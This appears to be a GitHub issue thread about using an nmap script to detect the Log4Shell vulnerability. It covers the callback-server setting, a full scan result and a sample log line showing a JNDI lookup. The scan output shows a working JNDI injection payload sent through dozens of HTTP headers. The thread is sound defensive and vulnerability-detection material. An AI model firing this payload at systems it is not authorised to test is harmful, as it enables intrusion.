nmap log4jshell.nse execution

[juanterio]

Hi,

First of all, thank you very much for this code. We are able to upload the NSE file in our NMAP.

Now the challenge we are facing right now is how to execute the scan. Based on the README.md, we just need to upload the nse file to our NMAP and do an update. However I am confused on the syntax:

nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p ]

1. Is the callback server the NMAP server we are using?
2. What is -p port for if we want to scan a server to see what ports are open and if vulnerable with log4j?
3. Do I also need to download JNDIExploit.zip to our NMAP server so that the command will take effect?
4. Do you have any sample result using this nse file?

[giterlizzi]

Hi @juanterio,

Is the callback server the NMAP server we are using?

Not necessarily. The "callback server" is the IP address (and port) that is sent by the NSE script in the payload. You can use another server and listening port that are reachable by the target.

What is -p port for if we want to scan a server to see what ports are open and if vulnerable with log4j?

You can specify one or more ports using -p argument or test the Well Known Port List without the -p arguement.

Do I also need to download JNDIExploit.zip to our NMAP server so that the command will take effect?

You can use another service (LDAP server, ncat, netcat, etc.) listening and reachable by the target.

Do you have any sample result using this nse file?

In README.md you have a sample of NSE output.

NOTE

This script is useful to detect the vulnerability of Log4Shell across the network, but requires a post-analisys. For example, if the target is protected by a firewall, by an IDS/IPS or a WAF i suggest to inspect these logs to see if your application is vulnerable or if it's necessary to update or activate rules to protect the application.

Joseph

[juanterio]

Thanks @giterlizzi for the details!

We tested the script from one of our server with sample result below. How do we know if the server is vulnerable with log4j?

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 10:24 China Standard Time
Nmap scan report for —removed—
Host is up (0.99s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
1720/tcp open h323q931
3389/tcp open ms-wbt-server
8009/tcp open ajp13
8080/tcp open http-proxy
| log4shell:
| Callback: 127.0.0.1:1389
| Payloads:
| ${jndi:ldap://127.0.0.1:1389}
| Test Method: HTTP
| URL Path: /
| HTTP Method: GET
| HTTP Headers:
| IPaddress: 200 OK
| Proxy-Authorization: 200 OK
| upgrade-insecure-requests: 200 OK
| Username: 200 OK
| X-Amz-Target: 200 OK
| User-Agent: 200 OK
| Authorization: 200 OK
| Max-Forwards: 200 OK
| X-Requested-With: 200 OK
| Accept-Encoding: 200 OK
| X-CSRF-Token: 200 OK
| Access-Control-Request-Headers: 200 OK
| Content-Type: 200 OK
| Pragma: 200 OK
| X-Amz-Date: 200 OK
| Expect: 417 Expectation Failed
| Referer: 200 OK
| Accept-Language: 200 OK
| Upgrade-Insecure-Requests: 200 OK
| Warning: 200 OK
| Content-Encoding: 200 OK
| TE: 200 OK
| Accept-Charset: 200 OK
| Origin: 200 OK
| Hostname: 200 OK
| IP: 200 OK
| X-Api-Version: 200 OK
| Accept-Datetime: 200 OK
| Content-Length: 500 Internal Server Error
| Range,: 200 OK
| Date: 200 OK
| Cookie: 200 OK
| Forwarded: 200 OK
| Dnt: 200 OK
| Content-Disposition: 200 OK
| Access-Control-Request-Method: 200 OK
| From: 200 OK
| Accept: 200 OK
|_ Note: (!) Inspect the callback server (127.0.0.1:1389) or web-application (—removed—:8080) logs
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 239.47 secondsp

[giterlizzi]

Inspect the application logs. If the application is vulnerable you can see a JNDI lookup in log:

2021-12-11 11:01:05,99 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]